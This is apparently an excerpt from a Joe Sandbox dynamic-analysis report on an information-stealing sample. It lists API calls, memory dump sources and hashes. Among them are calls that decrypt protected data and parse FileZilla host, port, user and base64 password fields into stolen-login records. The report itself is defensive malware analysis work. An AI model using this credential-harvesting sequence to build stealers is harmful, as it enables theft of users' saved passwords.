                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                  • String ID:
                                                  • API String ID: 3657800372-0
                                                  • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                  • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                                  • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                  • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B49885
                                                  • Process32First.KERNEL32(00420ACA,00000128), ref: 00B49899
                                                  • Process32Next.KERNEL32(00420ACA,00000128), ref: 00B498AE
                                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00B498C3
                                                  • CloseHandle.KERNEL32(00420ACA), ref: 00B498E1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                  • Instruction ID: 4f8914379ace5de2a1ad0c5150422a9cba58c993162de884b03d4d269dffbfcf
                                                  • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                  • Instruction Fuzzy Hash: AC01E979A50208FFDB24DFA4C994BEEB7F9EB49740F104189A505A6240D7749B40DF51
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                                  • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                                  • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                                  • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                  • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                                  • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                  • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                                  APIs
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                    • Part of subcall function 00B4AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B4ABD9
                                                    • Part of subcall function 00B4AB87: lstrcat.KERNEL32(00000000), ref: 00B4ABE9
                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 00B3E709
                                                  • StrCmpCA.SHLWAPI(?,004214F8), ref: 00B3E759
                                                  • StrCmpCA.SHLWAPI(?,004214FC), ref: 00B3E76F
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B3EE46
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                  • String ID:
                                                  • API String ID: 433455689-0
                                                  • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                                  • Instruction ID: 69ff83cf33b3244c801c245afbaa6bb1204c5ba3b018514c2e359322d16adb1b
                                                  • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                                  • Instruction Fuzzy Hash: A61261B1A902189BCB18FB64DD96EED73B9AF54700F4041EDB54A62092EF305F88DF52
                                                  APIs
                                                  • CryptBinaryToStringA.CRYPT32(00000000,00B353EB,40000001,00000000,00000000,?,00B353EB), ref: 00B49127
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BinaryCryptString
                                                  • String ID:
                                                  • API String ID: 80407269-0
                                                  • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                  • Instruction ID: 1baea96cf455cc6ea4e7114cbe7cbcb278c2c4fad7bf5d1769391a8c54a99904
                                                  • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                  • Instruction Fuzzy Hash: E011DA74204205BFDB00CF94D889FAB33FAEF89754F109598F9099B250D775E942EB60
                                                  APIs
                                                  • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BinaryCryptString
                                                  • String ID:
                                                  • API String ID: 80407269-0
                                                  • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                  • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                                  • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                  • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                                  APIs
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B35155,00000000,00000000), ref: 00B39D56
                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00B35155,00000000,?), ref: 00B39D68
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B35155,00000000,00000000), ref: 00B39D91
                                                  • LocalFree.KERNEL32(?,?,?,?,00B35155,00000000,?), ref: 00B39DA6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BinaryCryptLocalString$AllocFree
                                                  • String ID:
                                                  • API String ID: 4291131564-0
                                                  • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                  • Instruction ID: 80996bff0fa83e2ffe3ae338ebe7091956abea6610768337af15375b548720ec
                                                  • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                  • Instruction Fuzzy Hash: 141174B4641208FFEB10CFA4CC95FAA77B5EB89714F208158FD159B394C7B6A941CB90
                                                  APIs
                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B39DEB
                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00B39E0A
                                                  • memcpy.MSVCRT(?,?,?), ref: 00B39E2D
                                                  • LocalFree.KERNEL32(?), ref: 00B39E3A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                  • String ID:
                                                  • API String ID: 3243516280-0
                                                  • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                  • Instruction ID: cca28476750f76117751c5ff8a329355ab5931a94eec59549efa93afff64cc09
                                                  • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                  • Instruction Fuzzy Hash: 1C11FAB8A00209EFDB04DFA4D985AAE77F5FF89300F104558E91597350D770AE10CF61
                                                  APIs
                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                  • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                  • LocalFree.KERNEL32(?), ref: 00409BD3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                  • String ID:
                                                  • API String ID: 3243516280-0
                                                  • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                  • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                                  • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                  • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00879690,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00879690,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00879690,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                                  • wsprintfA.USER32 ref: 00417AB7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                  • String ID:
                                                  • API String ID: 362916592-0
                                                  • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                  • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                                  • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                  • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                                  APIs
                                                  • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                  • String ID:
                                                  • API String ID: 123533781-0
                                                  • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                  • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                                  • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                  • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$GetProcAddress.$l
                                                  • API String ID: 0-2784972518
                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                  • Instruction ID: 5ee842f9e70f6bfe9c2d340f46cecede20a1de39f7d62f2673a2353ecee3cee0
                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                  • Instruction Fuzzy Hash: 5B316CB6910609DFDB10DF99C880BAEBBF5FF48324F24419AD841AB311D771EA45CBA4
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 00B4D156
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                                  • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                                  • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                                  • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                                  • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                                  • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                                  • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279927835.000000000084A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0084A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_84a000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                  • Instruction ID: a0960686d8fd0543281ea1c1ec300c29cfad0d5ee163b2bce33ce20fd5145689
                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                  • Instruction Fuzzy Hash: A6112E723802049FD754DF59DCC5EA673EAFB89324B298055E904CB316D679EC41C761
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                  • Instruction ID: 60823f81e9b5496897a5374b4564ad7e610a9911b0c654d195f462cb48e2f466
                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                  • Instruction Fuzzy Hash: 3801F272B206008FDF21EF60C814BAA33E5FF86306F2544F4D90A97281E770A8418B80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free
                                                  • String ID:
                                                  • API String ID: 1294909896-0
                                                  • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                  • Instruction ID: 523a8b3a3df60fac56704ef0563598452e7346031eee9d7defb2cfc42ccd2556
                                                  • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                  • Instruction Fuzzy Hash: F571E5318D1B60FBD7633B31DD03E4976EA7F04302F1049B4B1D728D329A226A65BB52
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                  • strtok_s.MSVCRT ref: 0041031B
                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                                  • lstrlenA.KERNEL32(00000000), ref: 00410393
                                                    • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                                    • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                                  • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                                  • lstrlenA.KERNEL32(00000000), ref: 00410427
                                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                                  • lstrlenA.KERNEL32(00000000), ref: 00410475
                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                                  • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                                  • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                                  • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                                  • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                                  • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                                  • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
